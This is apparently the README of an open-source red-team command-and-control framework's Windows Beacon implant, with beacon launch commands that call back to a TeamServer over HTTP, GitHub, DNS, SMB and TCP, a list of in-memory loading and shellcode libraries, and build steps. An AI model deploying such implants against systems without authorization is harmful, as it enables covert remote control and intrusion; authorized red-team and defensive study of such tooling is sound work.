Exploration is a lightweight, modular Command and Control (C2) framework designed for red team operations. This repository provides the Beacon component implemented in C++ for targeting Windows systems. The corresponding TeamServer and Client components are available in the C2TeamServer repository.
This project includes multiple Beacons capable of communicating with the TeamServer through a variety of channels. Supported communication methods include HTTP/HTTPS, GitHub, DNS, SMB, and TCP.
# HTTP/HTTPS
BeaconHttp.exe <TEAMSERVER_IP> <LISTENER_PORT> <http|https>
BeaconHttp.exe 10.10.10.10 8443 https
BeaconHttp.exe 10.10.10.10 8080 http
# GitHub
BeaconGithub.exe <GITHUB_USER/REPO> <ACCESS_TOKEN>
BeaconGithub.exe maxDcb/C2Implant ghp_dsfgdfhdf5554456g4fdg465...
# DNS
BeaconDns.exe <DNS_SERVER> <TEAMSERVER_DOMAIN>
BeaconDns.exe 8.8.8.8 bac.superdomain.com
# SMB
BeaconSmb.exe <LISTENER_IP> <PIPE_NAME>
BeaconSmb.exe 127.0.0.1 pipename
# TCP
BeaconTcp.exe <LISTENER_IP> <LISTENER_PORT>
BeaconTcp.exe 127.0.0.1 4444This project relies on several third-party libraries and tools:
- Donut: Generates shellcode from PE files.
- COFFLoader: Executes object files such as those in CS-Situational-Awareness-BOF.
- MemoryModule: Enables runtime DLL loading.
- UnmanagedPowerShell: Executes PowerShell from unmanaged code.
- cpp-base64: Base64 encoding/decoding, built locally as the
c2_base64CMake target. - libssh2: SSH client support for the
SshExecmodule, provided by Conan. - nlohmann/json: JSON parsing, provided by Conan.
Install prerequisites:
- Chocolatey
- CMake
- Conan 2
- Visual Studio 2022 with the C++ toolchain
choco install cmake --pre
python -m pip install --user conanInitialize submodules:
git submodule update --initThe supported local configuration is Release with the static MSVC runtime (/MT). The top-level CMake file configures Conan so libssh2, OpenSSL/zlib transitive dependencies, and local targets use the same runtime.
Using the "x64 Native Tools Command Prompt for VS":
cmake -S . -B build-conan -G "Visual Studio 17 2022"
cmake --build build-conan --config Release -- /mFrom WSL, prefer the Visual Studio CMake executable so the generated paths stay Windows-native:
'/mnt/c/Program Files/Microsoft Visual Studio/2022/Community/Common7/IDE/CommonExtensions/Microsoft/CMake/CMake/bin/cmake.exe' \
-S E:/Dev/C2Implant \
-B E:/Dev/C2Implant/build-conan \
-G "Visual Studio 17 2022"
'/mnt/c/Program Files/Microsoft Visual Studio/2022/Community/Common7/IDE/CommonExtensions/Microsoft/CMake/CMake/bin/cmake.exe' \
--build E:/Dev/C2Implant/build-conan \
--config Release \
-- /mcmake -S . -B build-conan-x86 -G "Visual Studio 17 2022" -A Win32
cmake --build build-conan-x86 --config Release -- /mDependencies are declared in conanfile.txt. The CMake provider runs conan install automatically during configuration.
For Visual Studio generators, only the Release Conan configuration is installed by default. If you need a Debug build, configure with a cache override such as:
cmake -S . -B build-conan -G "Visual Studio 17 2022" -DCONAN_INSTALL_CONFIGURATIONS="Release;Debug"Do not manually force /MT through CMAKE_CXX_FLAGS; the project uses CMAKE_MSVC_RUNTIME_LIBRARY before project() so Conan detects the correct runtime.
- Compiled Beacons:
Release\Beacons - Compiled Module DLLs:
Release\Modules
GitHub Actions builds and tests the Windows Release configuration on pull requests, branch pushes, tags, and manual runs.
The release archive is staged from a clean artifact directory. It does not rename or delete the local Release\Beacons and Release\Modules folders.
Release.zip contains only the deliverables consumed by C2TeamServer releases:
WindowsBeacons: Beacon executables and DLLsWindowsModules: module DLLs